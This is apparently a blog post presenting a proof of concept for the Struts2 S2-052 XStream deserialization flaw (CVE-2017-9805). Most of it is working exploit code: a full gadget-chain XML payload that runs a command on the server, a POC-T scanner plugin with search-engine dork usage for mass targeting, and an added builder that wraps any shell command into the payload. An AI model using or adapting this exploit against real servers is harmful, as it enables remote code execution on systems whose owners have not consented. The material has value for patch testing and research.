[One Poc One Day]——Struts2 052


The Struts2 REST plugin (S2-052, CVE-2017-9805) deserializes XML request bodies through an XStreamHandler backed by XStream without any type filtering, so deserializing a crafted XML payload can lead to remote code execution. Any attacker who can reach a REST endpoint can submit malicious XML content to escalate privileges.

```xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>
```

Um... all of this is to fit POC-T: adapt more PoCs to it and build up your own script collection.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/yizhimanpadewoniu
# author = am4zing

"""
Struts2 S2-052
Affected versions: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Usage:
python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2052 -aZ "login.action"
python POC-T.py -s struts2-s2052 -iF FILE.txt
"""

import requests


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    try:
        header = dict()
        header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        # The REST plugin only hands the body to XStream when it is declared as XML.
        header['Content-Type'] = "application/xml"
        header['Connection'] = "close"
        header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        # Gadget chain ending in ProcessBuilder.start(); the command is
        # `touch /tmp/success`, so a successful hit leaves that file on the target.
        payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''
        response_data = requests.post(url, data=payload, headers=header, timeout=10)
        # Deserializing the chain makes the REST plugin fail with a 500; on an
        # unpatched version the error page names java.security.Provider$Service.
        if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text:
            return '[s2-052]' + url
        else:
            # POC-T treats a truthy return as a hit, so return False, not the body.
            return False

    except Exception:
        return False
```
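The payload above hardcodes `touch /tmp/success`. As an added example (not part of the original post or of PoC-T), the following Python builds the same gadget chain for any argv, XML-escapes each argument so the document stays well-formed, and applies the script's decision rule to a response. The names `build_payload`, `extract_argv` and `is_vulnerable` are introduced here, and the sample responses are constructed, not captured from a target; nothing is sent over the network.

```python
#!/usr/bin/env python3
# Added example, not code from the original post or from PoC-T: build the
# S2-052 XStream gadget chain for an arbitrary argv and classify a response
# with the same rule the PoC uses. Runs offline.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# The gadget chain split around the ProcessBuilder argv; identical to the
# payload above except that the <command> contents are filled in.
_HEAD = (
    '<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags>'
    '<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">'
    '<dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">'
    '<is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher">'
    '<initialized>false</initialized><opmode>0</opmode>'
    '<serviceIterator class="javax.imageio.spi.FilterIterator">'
    '<iter class="javax.imageio.spi.FilterIterator">'
    '<iter class="java.util.Collections$EmptyIterator"/>'
    '<next class="java.lang.ProcessBuilder"><command>'
)
_TAIL = (
    '</command><redirectErrorStream>false</redirectErrorStream></next></iter>'
    '<filter class="javax.imageio.ImageIO$ContainsFilter"><method>'
    '<class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/>'
    '</method><name>foo</name></filter><next class="string">foo</next>'
    '</serviceIterator><lock/></cipher>'
    '<input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer>'
    '<done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed>'
    '</is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler>'
    '<dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString>'
    '<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>'
    '</entry><entry>'
    '<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>'
    '<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>'
    '</entry></map>'
)


def build_payload(argv):
    """Return the gadget-chain XML that runs `argv` via ProcessBuilder.start().

    ProcessBuilder takes an argv list, not a shell line: redirection or
    pipes must be wrapped explicitly, e.g. ["/bin/sh", "-c", "..."].
    Each argument is XML-escaped so '&' or '<' inside a command cannot
    break the document before XStream parses it.
    """
    if not argv:
        raise ValueError("argv must contain at least the program to run")
    command = "".join("<string>%s</string>" % escape(arg) for arg in argv)
    return _HEAD + command + _TAIL


def extract_argv(payload):
    """Parse a payload and return the argv XStream would hand to
    ProcessBuilder; used to check that build_payload round-trips."""
    root = ET.fromstring(payload)
    return [s.text for s in root.findall(".//command/string")]


def is_vulnerable(status_code, body):
    """The PoC's decision rule: the chain makes the REST plugin fail inside
    XStream, so a 500, or an error page naming
    java.security.Provider$Service, is taken as a hit."""
    return status_code == 500 or "java.security.Provider$Service" in body


if __name__ == "__main__":
    payload = build_payload(["/bin/sh", "-c", "id > /tmp/s2052 && echo done"])
    print(extract_argv(payload))
    # Constructed sample responses, not captured from a real target.
    print(is_vulnerable(500, "<html>Internal Server Error</html>"))
    print(is_vulnerable(200, "<html>login</html>"))
```

A bare 500 is a weak signal on its own: any malformed body, or an unrelated server error, produces one, so the `java.security.Provider$Service` string is the more specific indicator, and the only real confirmation is the side effect of the command (the file it creates, or a callback it makes).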